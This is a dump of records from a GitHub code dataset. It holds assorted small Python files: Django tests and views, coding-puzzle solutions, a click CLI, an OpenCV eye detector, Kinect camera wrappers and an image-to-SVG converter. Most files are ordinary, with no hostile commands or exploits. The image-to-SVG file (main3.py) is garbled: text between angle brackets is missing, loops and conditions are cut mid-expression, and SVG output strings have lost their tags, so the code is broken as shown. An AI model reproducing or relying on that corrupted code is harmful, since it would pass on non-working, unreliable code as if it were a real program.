self.code_one.tags.add(\"javascript\",\"mapping\")\n self.code_two.tags.add(\"mapping\")\n self.code_three.tags.add(\"javascript\")\n \n \n def test_tags_added_properly(self):\n self.assertEqual(list(self.code_one.technology_tags.all()), [self.tech_tag])\n self.assertEqual(list(self.code_one.concept_tags.all()), [self.concept_tag])\n self.assertEqual(list(self.code_two.concept_tags.all()), [self.concept_tag])\n self.assertEqual(list(self.code_three.technology_tags.all()), [self.tech_tag])\n\n def test_get_validated_tag_list(self):\n tag_slug_list_one = [\"javascript\", \"mapping\"]\n tags_one = get_validated_tag_list(tag_slug_list_one)\n self.assertEqual(tags_one, [self.tech_tag, self.concept_tag])\n \n tag_slug_list_two = [\"javascript\", \"mapping\", \"this_tag_does_not_exist\"]\n self.assertRaises(Http404, lambda: get_validated_tag_list(tag_slug_list_two))\n \n def test_get_tag_filtered_queryset(self):\n code_objects = self.code_model.objects.all()\n\n tag_slug_list_one = [\"javascript\", \"mapping\"]\n queryset_one = get_tag_filtered_queryset(code_objects, tag_slug_list_one)\n self.assertQuerysetEqual(queryset_one, [self.code_one])\n\n tag_slug_list_two = [\"mapping\"]\n queryset_two = get_tag_filtered_queryset(code_objects, tag_slug_list_two)\n 
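# \"mapping\" alone should match both entries tagged with it (code_one and code_two):\n        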
self.assertQuerysetEqual(queryset_two, [self.code_one, self.code_two])\n\n        tag_slug_list_three = [\"javascript\"]\n        queryset_three = get_tag_filtered_queryset(code_objects, tag_slug_list_three)\n        self.assertQuerysetEqual(queryset_three, [self.code_one, self.code_three])\n    \n    def test_filter_queryset_by_tags(self):\n        code_objects = self.code_model.objects.all()\n\n        tag_slugs_one = \"javascript+mapping\"\n        queryset_one, tags_one = filter_queryset_by_tags(code_objects, tag_slugs_one, tags=[])\n        self.assertQuerysetEqual(queryset_one, [self.code_one])\n        self.assertEqual(tags_one, [self.tech_tag, self.concept_tag])\n        \n        tag_slugs_two = \"mapping\"\n        queryset_two, tags_two = filter_queryset_by_tags(code_objects, tag_slugs_two, tags=[])\n        self.assertQuerysetEqual(queryset_two, [self.code_one, self.code_two])\n        self.assertEqual(tags_two, [self.concept_tag])\n        \n        tag_slugs_three = \"javascript\"\n        queryset_three, tags_three = filter_queryset_by_tags(code_objects, tag_slugs_three, tags=[])\n        self.assertQuerysetEqual(queryset_three, [self.code_one, self.code_three])\n        self.assertEqual(tags_three, [self.tech_tag])\n\n        tag_slugs_four = \"javascript+this_tag_does_not_exist\"\n        self.assertRaises(Http404, lambda: filter_queryset_by_tags(\n            code_objects, tag_slugs_four, tags=[])\n        )\n    ","repo_name":"OpenNews/opennews-source","sub_path":"source/tags/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"}
{"seq_id":"22995488345","text":"\"\"\"\r\nA string is called \"balanced\" if the distance between every pair of adjacent characters\r\nin the string is exactly equal to the distance between the two corresponding positions\r\nin its reversed string.\r\nFor example, if a string s1 of length N has the reversed string s2, then s1 satisfies the\r\nbalance property if:\r\n|s1[i] - s1[i-1]| = |s2[i] - s2[i-1]| for all values 0 < i < N\r\nCheck whether an arbitrary string is \"balanced\" or not.\r\nInput:\r\n2\r\nacxz\r\nbcxz\r\nOutput:\r\nYES\r\nNO\r\n\"\"\"\r\nif __name__ == \"__main__\":\r\n    t = int(input())\r\n    for _ in range(t):\r\n        s = input()\r\n        rev = ''.join(reversed(s))\r\n        # rev = s[::-1]\r\n        ok = 0\r\n        for i in range(1, len(s)):\r\n            if abs(ord(s[i]) - ord(s[i - 1])) != abs(ord(rev[i]) - ord(rev[i - 1])):\r\n                print(\"NO\")\r\n                ok = 1\r\n                break\r\n        if ok == 0: print(\"YES\")","repo_name":"vantuan0128/PYTHON_PTIT","sub_path":"PY01066.py","file_name":"PY01066.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
{"seq_id":"7540935410","text":"import os\nimport sys\nimport click\nfrom tinydb import TinyDB\n\n\nCONTEXT_SETTINGS = dict(auto_envvar_prefix='SLOGGER')\n\n\nclass Context(object):\n\n    def __init__(self):\n        self.verbose = False\n        self.home = os.getcwd()\n\n    def log(self, msg, *args):\n        \"\"\"Logs a message to stderr.\"\"\"\n        if args:\n            msg %= args\n        click.echo(msg, file=sys.stderr)\n\n    def warning(self, msg, *args):\n        \"\"\"Logs a warning to stderr.\"\"\"\n        self.log(click.style(\"## WARNING - %s\" % msg, *args, fg='yellow'))\n\n    def error(self, msg, *args):\n        \"\"\"Logs an error to stderr.\"\"\"\n        self.log(click.style(\"## ERROR - %s\" % msg, *args, fg='red'))\n\n    def info(self, msg, *args):\n        \"\"\"Logs an info message to stderr.\"\"\"\n        self.log(click.style(\"## INFO - %s\" % msg, *args, fg='blue'))\n\n    def debug(self, msg, *args):\n        \"\"\"Logs a message to stderr only if verbose is enabled.\"\"\"\n        if self.verbose:\n            
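# ctx.verbose is set from the top-level -v/--verbose flag declared on cli() below.\n            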
self.log(click.style(\"DEBUG - %s\" % msg, *args, fg='green'))\n\n\npass_context = click.make_pass_decorator(Context, ensure=True)\ndb = TinyDB(os.path.expanduser('~/.slogger.json'))\ncmd_folder = os.path.abspath(os.path.join(os.path.dirname(__file__),\n 'commands'))\n\n\nclass ComplexCLI(click.MultiCommand):\n\n def list_commands(self, ctx):\n rv = []\n for filename in os.listdir(cmd_folder):\n if filename.endswith('.py') and \\\n filename.startswith('cmd_'):\n rv.append(filename[4:-3])\n rv.sort()\n return rv\n\n def get_command(self, ctx, name):\n try:\n if sys.version_info[0] == 2:\n name = name.encode('ascii', 'replace')\n mod = __import__('slogger.commands.cmd_' + name,\n None, None, ['cli'])\n except ImportError:\n return\n return mod.cli\n\n\n@click.command(cls=ComplexCLI, context_settings=CONTEXT_SETTINGS)\n@click.option('-v', '--verbose', is_flag=True,\n help='Enables verbose mode.')\n@pass_context\ndef cli(ctx, verbose):\n \"\"\"Logging interface to add messages to a file based on project\"\"\"\n ctx.verbose = verbose\n\nif __name__ == \"__main__\":\n cli()","repo_name":"gabeduke/slogger","sub_path":"slogger/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34412580027","text":"import numpy as np\n\ndef Biaxial_Sakino_Cir(D, t, fc, fy):\n #Steel properties\n fyt = 1.08 * fy\n fyc = 0.91 * fy\n \n #Confined Concrete\n k = 4.1\n ke = 23.0\n ru = 1.67 * D**-0.112\n fcp = fc * ru\n Ec = (6.9 + 3.32 * fcp**0.5) * 1.0e3\n ec = 0.94 * fcp**0.25 * 1.0e-3\n fr = 2.0 * t * 0.19 * fy / (D - 2.0 * t)\n fre = k / ke * fr\n fcc = fcp + k * fr\n K = fcc / fcp\n if K <= 1.5:\n ecc = ec * (1.0 + 4.7 * (K - 1.0))\n else:\n ecc = ec * (3.35 + 20.0 * (K - 1.5))\n return fcc, fyc, fyt\n \n ","repo_name":"ydjiang234/Design","sub_path":"Biaxial_Sakino.py","file_name":"Biaxial_Sakino.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71660826782","text":"from algorithms import *\nfrom myGeometry import polygon_area,point\nimport numpy as np\nimport random\nfrom PIL import Image,ImageDraw\nfrom delaunay_mesh import mesh\ndef colordis(a,b):\n\treturn np.linalg.norm(np.array(a)-np.array(b))\ndef npa2tuple_color(arr):\n\treturn tuple([int(i) for i in arr])\ndef smooth_points(points,step=2.4,start=0,end=None):\n\tif(end is None):\n\t\tend=len(points)\n\t\n\tret=[]\n\twhile(startcutdown_dots):\n\t\tblur_dots*=(len(dots)/cutdown_dots)**0.5\n\t\tblur_dots=min(blur_dots,2.5)\n\t\tdots=random.sample(dots,cutdown_dots)\n\tprt('')\n\tprt('')\n\tprt('')\n\tfor loop in loops:\n\t\tarea,points,c=loop\n\t\txs=[x for x,y in points]\n\t\tys=[y for x,y in points]\n\t\tdx=max(xs)-min(xs)\n\t\tdy=max(ys)-min(ys)\n\t\taz=max(dx,dy)/((min(dx,dy)+0.1)**0.5)\n\t\tif(loop_trim and az>30):\n\t\t\tif(dx'%(c,*c[:3],loop_stroke_width*scale))\n\t\telse:\n\t\t\tprt('Z\" fill=\"RGB%s\" stroke=\"none\" />'%(c,))\n\tfor i in dots:\n\t\txy,c,rad=i\n\t\tx,y=xy\n\t\trad=rad/1.2\n\t\tprt(''%(x*scale,y*scale,rad*blur_dots*scale,*c[:3],70/blur_dots/blur_dots))\n\tfor line in lines:\n\t\tpoints,c=line\n\t\tpoints=smooth_points(points,smooth)\n\t\tprt(''%(*c[:3],100*line_alpha,1.5*scale))\n\tfor line in lines:\n\t\tpoints,c=line\n\t\tpoints=smooth_points(points,smooth)\n\t\tprt(''%(*c[:3],50*line_alpha,3*scale))\n\t\n\tprt(\"\",end='')\n\treturn 
out\ndx8=[1,1,0,-1,-1,-1,0,1]\ndy8=[0,1,1,1,0,-1,-1,-1]\ndxy8=[(dx8[i],dy8[i]) for i in range(8)]\ndx4=[0,0,1,-1]\ndy4=[1,-1,0,0]\ndxy4=[(dx4[i],dy4[i]) for i in range(4)]\ndef kmeans_with_kdt(k,points,n_iter=3,wei=None,progress_cb=None):\n\timport kdt\n\tdef convert(p):\n\t\tif(isinstance(p,point)):\n\t\t\treturn kdt.point(p.xy)\n\t\telse:\n\t\t\treturn kdt.point(p)\n\tn=len(points)\n\trets=random.sample(points,k)\n\tfor iter in range(n_iter):\n\t\t#print('ln109',len(rets),k)\n\t\tK=kdt.kdt()\n\t\tK.build([convert(_) for _ in rets])\n\t\tcnt=dict()\n\t\tsum=dict()\n\t\tfor idx,i in enumerate(points):\n\t\t\tif(progress_cb):\n\t\t\t\tprogress_cb((iter*n+idx)/n/n_iter)\n\t\t\tnn=K.ann1(convert(i))\n\t\t\tif(wei is None):\n\t\t\t\tcnt[nn]=cnt.get(nn,0)+1\n\t\t\t\tif(nn in sum):\n\t\t\t\t\tsum[nn]=i+sum[nn]\n\t\t\t\telse:\n\t\t\t\t\tsum[nn]=i\n\t\t\telse:\n\t\t\t\tcnt[nn]=cnt.get(nn,0)+wei[idx]\n\t\t\t\tif(nn in sum):\n\t\t\t\t\tsum[nn]=i*wei[idx]+sum[nn]\n\t\t\t\telse:\n\t\t\t\t\tsum[nn]=i*wei[idx]\n\t\trets=[]\n\t\tfor i in cnt:\n\t\t\trets.append(sum[i]/cnt[i])\n\t\tif(len(rets)0.1):\n\t\t\tenmiao=\"#\"*int(prog*width)\n\t\t\tenmiao+=\".\"*max(width-len(enmiao),0)\n\t\t\tremain=(t-first_prog[title])/(prog+1e-10)*(1-prog)\n\t\t\tprint(title,\"[\"+enmiao+\"] %.1f secs remain\"%(remain),end='\\r')\n\t\t\tlast_prog=t\n\tw,h=img.size\n\trate=(ss/w/h)**0.5\n\tsample_w,sample_h=int(w*rate),int(h*rate)\n\t\n\tsimg=img.resize((sample_w,sample_h),Image.LANCZOS)\n\t\n\tcolors=[]\n\t\n\tsample_color=int((n_colors*ss)**0.5)\n\txys=list(wh_iter(sample_w,sample_h))\n\tfor idx,xy in enumerate(random.sample(xys,sample_color)):\n\t\tif(print_progress):\n\t\t\tprogbar('sample colors',idx/sample_color)\n\t\tcolors.append(np.array(simg.getpixel(xy),np.float32))\n\t\n\tcolors=kmeans_with_kdt(n_colors,colors,progress_cb=prog_cb('merge color'))\n\timport kdt\n\tK=kdt.kdt()\n\tK.build([kdt.point(c) for c in colors])\n\tfor u in range(K.size):\n\t\tif(not K.node_points[u]):continue\n\t\tfor idx,i in enumerate(K.node_points[u]):\n\t\t\t\n\t\t\tK.node_points[u][idx].arr=tuple([int(j) for j in i.arr])\n\tsimg_arr=np.zeros((sample_w,sample_h),np.uint32)\n\tid2c=dict()\n\tfor xy in wh_iter(sample_w,sample_h):\n\t\tx,y=xy\n\t\tif(print_progress):\n\t\t\tprogbar(\"simplify image\",(y*sample_w+x)/sample_w/sample_h)\n\t\tc=simg.getpixel(xy)\n\t\tid=K.ann1(kdt.point(c)).id\n\t\t#c=npa2tuple_color(c)\n\t\tid2c[id]=c\n\t\tsimg_arr[x,y]=id\n\tif(debug):\n\t\t\n\t\tfor xy in wh_iter(sample_w,sample_h):\n\t\t\tprogbar(\"ln206\",(y*sample_w+x)/sample_w/sample_h)\n\t\t\tx,y=xy\n\t\t\tsimg.putpixel(xy,id2c[simg_arr[x,y]])\n\t\tsimg.show()\n\t\tpass\n\tpixel_group=DJS()\n\tpixel_wei=dict()\n\tall_edges=set()\n\tfor xy in wh_iter(sample_w-1,sample_h-1):\n\t\tx,y=xy\n\t\tif(print_progress):\n\t\t\tprogbar(\"join color block\",(y*(sample_w-1)+x)/(sample_w-1)/(sample_h-1))\n\t\tc=simg.getpixel(xy)\n\t\tpixel_wei[xy]=1\n\t\tfor dx,dy in [(0,1),(1,0),(1,1)]:\n\t\t\tx1,y1=x+dx,y+dy\n\t\t\tc1=simg.getpixel((x1,y1))\n\t\t\t\n\t\t\tif(simg_arr[x,y]==simg_arr[x1,y1]):\n\t\t\t\tpixel_group.join(xy,(x1,y1))\n\t\t\t\tpixel_group.find(xy)\n\t\t\t\tpixel_group.find((x1,y1))\n\t\t\telse:\n\t\t\t\tall_edges.add(xy)\n\t\t\t\tall_edges.add((x1,y1))\n\t\t\tpixel_wei[xy]+=colordis(c,c1)\n\t\n\tgroup_area=dict()\t\n\tfor xy in wh_iter(sample_w,sample_h):\n\t\tg=pixel_group.find(xy)\n\t\tgroup_area[g]=group_area.get(g,0)+1\n\t\n\tgroup_edges=dict()\n\tfor idx,xy in enumerate(all_edges):\n\t\tif(print_progress):\n\t\t\tprogbar(\"add 
edges\",idx/len(all_edges))\n\t\tg=pixel_group.find(xy)\n\t\tif(g not in group_edges):\n\t\t\tgroup_edges[g]=list()\n\t\tgroup_edges[g].append(xy)\n\tif(debug):\n\t\taz=Image.new(\"RGB\",simg.size)\n\t\ttmp=dict()\n\t\tfrom PIL import ImageColor\n\t\taaa=list(group_edges)\n\t\trandom.shuffle(aaa)\n\t\tfor idx,i in enumerate(aaa):\n\t\t\tH=idx*360/len(group_edges)\n\t\t\tc=ImageColor.getrgb(\"HSV(%d,100%%,100%%)\"%H)\n\t\t\ttmp[i]=c\n\t\tfor xy in wh_iter(*az.size):\n\t\t\tg=pixel_group.find(xy)\n\t\t\tc=tmp.get(g,(0,0,0))\n\t\t\taz.putpixel(xy,c)\n\t\taz.show()\n\tif(n_points is None):\n\t\tn_points=0\n\t\tfor i in group_edges:\n\t\t\tn_points+=group_area[i]**0.5\n\t\tn_points=int(max(n_points*0.5,len(group_edges)*1.5))\n\tnow_points=sum([len(group_edges[i]) for i in group_edges])\n\t_prog=0\n\trate=n_points/now_points\n\tif(rate<1):\n\t\tprint(\"merge %d points(from%d groups) into %d points\"%(now_points,len(group_edges),n_points))\n\t\tif(debug):\n\t\t\tpass\n\tpoints=list()\n\tdef upscale(p):\n\t\treturn point(p.x*w/sample_w,p.y*h/sample_h)\n\tfor i,edges in group_edges.items():\n\t\t_points=[point(x,y) for x,y in edges]\n\t\t\n\t\tle=len(_points)\n\t\tk=int(rate*le)\n\t\tif(kk):\n\t\t\t\tprint(\"wtf\")\n\t\t\t\texit()\n\t\telif(k==0):\n\t\t\t#print(\"ln242\")\n\t\t\tif(random.random()>rate):\n\t\t\t\t_points=[]\n\t\t\n\t\t_prog+=le\n\t\tif(print_progress):\n\t\t\tprogbar(\"merge points\",_prog/now_points)\n\t\tpoints.extend(_points)\n\t\n\tif(ensure_corner==True):\n\t\tfor x in [0,sample_w-1]:\n\t\t\tfor y in [0,sample_h-1]:\n\t\t\t\tpoints.append(point(x,y))\n\tenmiao=1e2\n\tpoints=list(set([point(int(p.x*enmiao),int(p.y*enmiao)) for p in points]))\n\tprint('%d points '%len(points))\n\tpoints=[point(p.x/enmiao,p.y/enmiao) for p in points]\n\tM=mesh.delaunay(points,prog_cb=prog_cb('delaunay'))\n\tif(print_progress):\n\t\tprogbar('','',print_finish=True)\n\tmx=max([i.x for i in points])\n\t\n\tloops=[]\n\ttri_points=M.get_tri_integral_point()\n\t\n\tdef get(x,y):\n\t\treturn im.getpixel((int(x),int(y)))[:3]\n\t\n\tfor abc,_pts in tri_points.items():\n\t\ta,b,c=abc\n\t\tA,B,C=M.points[a],M.points[b],M.points[c]\n\t\tif(not _pts):\n\t\t\tCC=(A+B+C)/3\n\t\t\tcolor=get(CC.x*w/sample_w,CC.y*h/sample_h)\n\t\telse:\n\t\t\t\n\t\t\tcolor=np.zeros((3,),np.float32)\n\t\t\t\n\t\t\tfor x,y in _pts:\n\t\t\t\tcolor+=np.array(get(x*w/sample_w,y*h/sample_h),np.float32)\n\t\t\tcolor=npa2tuple_color(color/len(_pts))\n\t\t\n\t\t\n\t\tloops.append((1,[upscale(A).xy,upscale(B).xy,upscale(C).xy],color))\n\treturn loops\nif(__name__=='__main__'):\n\tfrom glob import glob\n\tfrom os import path\n\timport random\n\tpth=path.dirname(__file__)\n\tims=list(glob(path.join(pth,'*.jpg')))\n\tims+=list(glob(path.join(pth,'*.png')))\n\tif(ims):\n\t\tim=Image.open(random.choice(ims)).convert(\"RGB\")\n\timport time\n\ttm=time.time()\n\tloops=img2loops(im,n_colors=32,ss=2e5,debug=True)\n\ttm=time.time()-tm\n\t\n\tww=1600\n\thh=900\n\tw,h=im.size\n\ts=ldl2svg(loops,[],[],scale=min(ww/w,hh/h))\n\tfrom os import path\n\twith open(path.join(path.dirname(__file__),'sample_loops=%d_method=main3.svg'%len(loops)),\"w\") as f:\n\t\tf.write(s)\n\tperformance=len(loops)/tm\n\tprint(\"===[time=%d seconds,\\tperformance=%d loop/sec]===\"%(tm,performance))","repo_name":"TkskKurumi/img2svg","sub_path":"main3.py","file_name":"main3.py","file_ext":"py","file_size_in_byte":9851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"40986490741","text":"from sortedcontainers import 
SortedDict,SortedList\nfrom collections import defaultdict\nclass Solution:\n def rectangleArea(self, rectangles) -> int:\n ls =[]\n st =SortedList()\n dic=defaultdict(list)\n for a,b,c,d in rectangles:\n dic[a].append((d,-1,1))\n dic[a].append((b,1,1))\n dic[c].append((d,-1,-1))\n dic[c].append((b,1,-1))\n sm = 0\n keys = sorted(dic.keys())\n\n lastIdx =0 \n mod = 10**9+7\n ttm =0\n for k in keys:\n dic2 = defaultdict(list)\n for a,b,c in dic[k]:\n if c ==1:\n st.add((a,b))\n else:\n st.remove((a,b))\n for a,b in st:\n dic2[a].append(b)\n acc =0\n last =0\n tm =0 \n #print(dic2,st)\n for k2 in sorted(dic2.keys()):\n if acc >0:\n tm += k2 - last\n last = k2\n for b in dic2[k2]:\n acc += b \n sm += ttm * (k-lastIdx)\n lastIdx = k\n ttm = tm\n sm = sm%mod\n #print(sm,k,ttm,lastIdx)\n return sm\n\nre = Solution().rectangleArea([[25,20,70,27],[68,80,79,100],[37,41,66,76]])\n#re = Solution().rectangleArea( [[0,0,2,2],[1,0,2,3],[1,0,3,1]])\nprint(re)\n\n ","repo_name":"wherby/code","sub_path":"questions/0000/q80.py","file_name":"q80.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"40441997079","text":"from typing import List\nfrom collections import defaultdict\n\n\nclass Solution:\n def findRedundantConnection(self, edges: List[List[int]]) -> List[int]:\n parent = [0] + list(range(1, len(edges) + 1))\n weight = [0] + ([1] * len(edges))\n\n def get_root(v: int) -> int:\n if parent[v] == v:\n return v\n else:\n root = get_root(parent[v])\n parent[v] = root # path compression\n return root\n\n def join(v: int, u: int) -> None:\n rv, ru = get_root(v), get_root(u)\n if weight[rv] < weight[ru]:\n parent[rv] = ru\n weight[ru] += weight[rv]\n else:\n parent[ru] = rv\n weight[rv] += weight[ru]\n\n for e1, e2 in edges:\n if get_root(e1) == get_root(e2):\n # already connected:\n return [e1, e2]\n else:\n join(e1, e2)\n return []\n","repo_name":"darren-huang/leetcode-grind","sub_path":"neetcode150/11.Graphs/10.2-redundant_connections_disjoint_sets.py","file_name":"10.2-redundant_connections_disjoint_sets.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72671372062","text":"from read_file import read_file\n\n\ndef names_scores(filename):\n names = read_file(filename).sort()\n return sum((i + 1) * sum(ord(c) - ord(\"A\") + 1 for c in name) for (i, name) in enumerate(names))\n\n\nif __name__ == \"__main__\":\n print(names_scores(\"given.txt\"))\n","repo_name":"TurtleSmoke/Project-Euler","sub_path":"problems/problem_0022/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"38030213021","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n\r\n@author: Tingting Zhu\r\n@contact: tingting.zhu@eng.ox.ac.uk\r\n@reference: \r\nGPy Library https://github.com/SheffieldML/GPy\r\nGPy Document https://gpy.readthedocs.io/en/deploy/\r\n\r\n\"\"\"\r\n\r\n#%% Gaussian process classification\r\n\r\n#%% import libraries\r\n\r\nimport GPy\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\ndef plot_gp(X, m, C, training_points=None):\r\n \"\"\" Plotting utility to plot a GP fit with 95% confidence interval \"\"\"\r\n # Plot 95% confidence interval \r\n plt.fill_between(X[:,0],\r\n m[:,0] - 1.96*np.sqrt(np.diag(C)),\r\n m[:,0] + 1.96*np.sqrt(np.diag(C)),\r\n alpha=0.5)\r\n # Plot 
GP mean and initial training points\r\n plt.plot(X, m, \"-\")\r\n plt.legend(labels=[\"GP fit\"])\r\n plt.xlabel(\"x\"), plt.ylabel(\"f\")\r\n \r\n # Plot training points if included\r\n if training_points is not None:\r\n X_, Y_ = training_points\r\n plt.plot(X_, Y_, \"kx\", mew=2)\r\n plt.legend(labels=[\"GP fit\", \"sample points\"])\r\n\r\n\r\n#%% draw the latent function value from a RBF kernel\r\nk = GPy.kern.RBF(1, variance=10., lengthscale=0.1)\r\nnp.random.seed(1000)\r\nX = np.linspace(0., 1., 100)[:, None]\r\nf = np.random.multivariate_normal(np.zeros(100), k.K(X,X))\r\n\r\nplt.figure(figsize=(20,10))\r\nplt.plot(X, f, 'b-')\r\nplt.title('latent function values');\r\nplt.xlabel('$x$');plt.ylabel('$f(x)$')\r\n\r\n\r\n#%% squash the latent function between [0, 1] using the probit link function\r\n\r\n# define link function\r\n\r\n# transfer f\r\n\r\n#%% draw samples form a Bernoulli distribution with success probability equal\r\n# to the transformed latent function\r\n\r\n\r\n\r\n#%% Inference via GP using expectation propagation\r\n\r\n# definea kernel to generate f\r\n\r\n\r\n# using the core GP model to tailor the desired inference method and likelihood \r\n\r\n\r\n#%% Inference via GP using Laplace\r\n\r\n# definea kernel to generate f\r\n\r\n# using the core GP model to tailor the desired inference method and likelihood \r\n\r\n\r\n# both Laplace and EP might give you different result for the hyperparameters!\r\n\r\n#%% predict using X_new\r\nX_new = np.linspace(0., 1., 50)[:, None]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"apcreagh/CDTworkshop_ML4timeseries","sub_path":"labs/lab_2/tutorial4.py","file_name":"tutorial4.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"18229042375","text":"import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture(0)\n\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\nwhile True:\n ret, frame = cap.read()\n\n eyes = eye_cascade.detectMultiScale(frame, scaleFactor=1.1, minNeighbors=5)\n for(ex,ey,ew,eh) in eyes:\n cv2.rectangle(frame, (ex,ey), (ex + ew , ey + eh), (255, 0, 0), 3)\n\n cv2.imshow(\"Eye Detected\", frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"rattasakAong/Eyes-Detection","sub_path":"eyesdetectfull.py","file_name":"eyesdetectfull.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40757547588","text":"import logging\n\nfrom django.http import HttpResponseRedirect, HttpResponseNotFound, HttpResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\n\nfrom students.models import Student\n\n\ndef students(request):\n queryset = Student.objects.all().select_related('groups')\n fn = request.GET.get('q')\n if fn:\n q1 = queryset.filter(first_name__istartswith=fn)\n q2 = queryset.filter(last_name__istartswith=fn)\n q3 = queryset.filter(emails__istartswith=fn)\n queryset = q1.union(q2).union(q3)\n return render(request, 'student_list.html', context={'students_list': queryset})\n\n\ndef generate_student(request):\n student = Student.generate_student()\n return HttpResponse(f'{student.get_info()}')\n\n\ndef students_add(request):\n from .forms import StudentsAddForm\n\n if request.method == 'POST':\n form = StudentsAddForm(request.POST)\n if form.is_valid():\n form.save()\n from django.urls import reverse\n return 
HttpResponseRedirect(reverse('students'))\n else:\n form = StudentsAddForm()\n\n return render(request,\n 'student_add.html',\n context={'form': form})\n\n\ndef students_edit(request, pk):\n from .forms import StudentsAddForm\n try:\n student = Student.objects.get(id=pk)\n except Student.DoesNotExist:\n return HttpResponseNotFound(f'Student with id {pk} not found')\n\n if request.method == 'POST':\n form = StudentsAddForm(request.POST, instance=student)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('students-list'))\n else:\n form = StudentsAddForm(instance=student)\n\n return render(request,\n 'student_edit.html',\n context={'form': form, 'pk': pk})\n\n\ndef students_delete(request, pk):\n Student.objects.get(id=pk).delete()\n return HttpResponseRedirect(reverse('students-list'))\n\n\ndef email(request):\n from students.forms import ContactForm\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n logging.info(f\"USER CONTACTED WITH MAIL: {form.cleaned_data['email']} \"\n f\"AND SUBJECT: {form.cleaned_data['subject']}\")\n form.save()\n return HttpResponseRedirect(reverse('students-list'))\n else:\n form = ContactForm()\n\n return render(request,\n 'contact.html',\n context={'form': form})\n","repo_name":"kolesnicknick/students_tracker","sub_path":"src/students/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4503653568","text":"from pykinect2 import PyKinectV2\nfrom pykinect2.PyKinectV2 import *\nfrom pykinect2 import PyKinectRuntime\nimport pyk4a\nfrom pyk4a import Config, PyK4A, ColorResolution\nimport numpy as np\nimport cv2\nimport time\n\n\nclass kinect2:\n def __init__(self):\n self.cam = PyKinectRuntime.PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color | PyKinectV2.FrameSourceTypes_Infrared | PyKinectV2.FrameSourceTypes_Depth)\n self.COLOR_HGT = self.cam.color_frame_desc.Height\n self.COLOR_WID = self.cam.color_frame_desc.Width\n self.DEPTH_HGT = self.cam.depth_frame_desc.Height\n self.DEPTH_WID = self.cam.depth_frame_desc.Width\n \n \n def read_color_frame(self):\n frame = self.cam.get_last_color_frame()\n frame_new = frame.reshape([self.COLOR_HGT, self.COLOR_WID, 4])[:, :, 0:3]\n return frame_new\n def read_depth_frame(self):\n frame = self.cam.get_last_depth_frame()\n frame_new = frame.reshape([self.DEPTH_HGT, self.DEPTH_WID])\n return frame_new\n def read_gray_frame(self):\n frame = self.cam.get_last_infrared_frame()\n frame_new = frame.reshape([self.DEPTH_HGT, self.DEPTH_WID])\n return frame_new\n\n\nclass kinect4:\n def __init__(self):\n print(\"使用pyk4a打开Kinect4\")\n self.cam = PyK4A(Config(color_resolution=ColorResolution.RES_1536P,\n depth_mode=pyk4a.DepthMode.NFOV_UNBINNED,\n synchronized_images_only=True))\n self.COLOR_HGT = 1536\n self.COLOR_WID = 2048\n self.DEPTH_HGT = 576\n self.DEPTH_WID = 640\n self.distCoeffs = np.array([0.513059, -2.77779, -0.000323, 0.000703, 1.62693, 0.391017, -2.593868, 1.548565])\n self.cameramtx = np.array([[976.405945, 0, 1020.967651],\n [0, 976.266479, 779.519653],\n [0, 0, 1]])\n self.cam.connect()\n \n \n def get_capture(self):\n img_color, img_depth = self.cam.get_capture(transform_depth_to_color=True) # Would also fetch the depth image\n if np.any(img_color) and np.any(img_depth):\n return img_color[:, :, :3], img_depth\n \n def __del__(self):\n self.cam.disconnect()\n\n\nclass kinect4_simulated:\n def __init__(self):\n 
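# Stand-in for the real device: get_capture() below just loads a fixed color/depth pair from disk (machine-specific paths).\n        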
